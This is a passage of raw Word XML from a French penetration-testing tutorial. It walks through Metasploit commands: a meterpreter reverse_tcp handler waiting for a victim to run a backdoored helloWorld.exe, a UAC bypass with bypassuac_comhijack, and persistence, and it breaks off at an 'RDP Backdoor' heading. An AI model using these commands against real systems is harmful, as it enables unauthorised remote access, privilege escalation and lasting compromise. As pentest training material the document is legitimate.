        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="27" w:name="_Toc121842991"/>
      <w:r/>
      <w:bookmarkStart w:id="28" w:name="_Toc123116337"/>
      <w:r>
        <w:t xml:space="preserve">Exécution du payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r/>
      <w:bookmarkEnd w:id="28"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1045"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Afin que cette étape fonctionne, il faut que l’utilisateur clique sur votre malware, mais tout d’abord nous allons sur la console msfconsole, pour cela tapez msfconsole pour activer le Metasploit :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:jc w:val="cente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4028300" cy="2537340"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1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1"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4046809" cy="25489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317.2pt;height:199.8pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId31" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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t xml:space="preserve">Vous avez maintenant généré votre porte dé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">robée. Lorsque la victime clique sur helloWorld.exe, la charge utile du shell qui est intégrée sera activée et établira une connexion avec votre système. Pour recevoir la connexion, vous devez ouvrir le multi-handler dans Metasploit et définir le payload :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/handler</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload windows/meterpreter/reverse_tcp</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lhost 192.168.240.140</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lport 3232</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exploit</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t xml:space="preserve">Après avoir renseigner les informations, utiliser la commande exploite, qui nous permettra de nous connecter à la machine de la victime, une fois qui lancera l’exécutable helloWord.exe :</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5759450" cy="1750695"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:docPr id="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2"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="17506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53.5pt;height:137.8pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId32" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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t xml:space="preserve">Comme vous pouvez le voir, une fois exécuté, nous avons accès à la machine de la victime. </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5759450" cy="2343150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1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3"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="23431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53.5pt;height:184.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId33" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Étant donné que le fichier n'a pas été exécuté en tant qu'"administrateur", certaines commandes Meterpreter ne peuvent pas être exécutées car elles entraîneraient une réponse "accès refusé". Cela peut être confirmé en exécutant la commande getuid. :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4162425" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="1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4"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4162425" cy="457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27.8pt;height:36.0pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId34" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">En tapant getsystem vous verrez que vos droits sont restreints :</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5759450" cy="1079500"/>
                <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                <wp:docPr id="2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5"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="1079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53.5pt;height:85.0pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId35" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="29" w:name="_Toc121842992"/>
      <w:r/>
      <w:bookmarkStart w:id="30" w:name="_Toc123116338"/>
      <w:r>
        <w:t xml:space="preserve">Escalade de privilèges « jeton d’imitation »</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r/>
      <w:bookmarkEnd w:id="30"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Étant donné que les méthodes utilisées par getsystem échouent toutes, nous avons besoin d'une méthode alternative d'élévation des privilèges.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous utiliserons le module d'exploitation comhijack pour contourner le contrôle d'accès utilisateur. Pour ce faire, nous "mettons en arrière-plan" notre session Meterpreter, avec la commande :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>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background</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Et si on tape la commande « sessions », nous pouvons voire que notre session 1 est toujours actif :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>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5759450" cy="1687628"/>
                <wp:effectExtent l="0" t="0" r="0" b="8255"/>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6"/>
                        <a:srcRect l="0" t="4606" r="0" b="0"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="1687628"/>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53.5pt;height:132.9pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="f">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId36" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Basculons notre exploit de multi/handler vers windows/local/bypassuac_comhijack et implémentons ceci sur la session en arrière-plan, en utilisant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SESSION 1, ensuite nous allons définir le payload, en x64, le lhost et en dernier, le lport :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/local/bypassuac_comhijack</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> session 1</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload windows/x64/meterpreter/reverse_tcp</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lhost 192.168.240.140</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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lport 3232</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>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5759450" cy="1445895"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:docPr id="2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7"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="14458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53.5pt;height:113.8pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId37" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Et enfin, vous exécuté avec la commande :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5759450" cy="2136775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2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8"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="21367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53.5pt;height:168.2pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId38" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tooltip="https://pentesthacker.wordpress.com/2020/12/24/bypassing-uac-in-windows-10/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pentesthacker.wordpress.com/2020/12/24/bypassing-uac-in-windows-10/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="31" w:name="_Toc121842993"/>
      <w:r/>
      <w:bookmarkStart w:id="32" w:name="_Toc123116339"/>
      <w:r>
        <w:t xml:space="preserve">Persistance « Backdoor »</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r/>
      <w:bookmarkEnd w:id="32"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Le maintien de l'accès est une phase très importante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> des tests d'intrusion, malheureusement, c'est celle qui est souvent négligée. La plupart des testeurs d'intrusion se laissent emporter chaque fois qu'un accès administratif est obtenu, donc si le système est corrigé ultérieurement, ils n'y ont plus accès.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Les portes dérobées persistantes nous aident à accéder à un système que nous avons compromis avec succès dans le passé. Pour ce faire nous alons utiliser la commande :</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Run persistance –h</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:jc w:val="cente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3857178" cy="2407920"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2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40"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3859197" cy="2409180"/>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03.7pt;height:189.6pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId40" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="33" w:name="_Toc121842994"/>
      <w:r/>
      <w:bookmarkStart w:id="34" w:name="_Toc123116340"/>
      <w:r>
        <w:t xml:space="preserve">Méthode « RDP Backdoor » :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
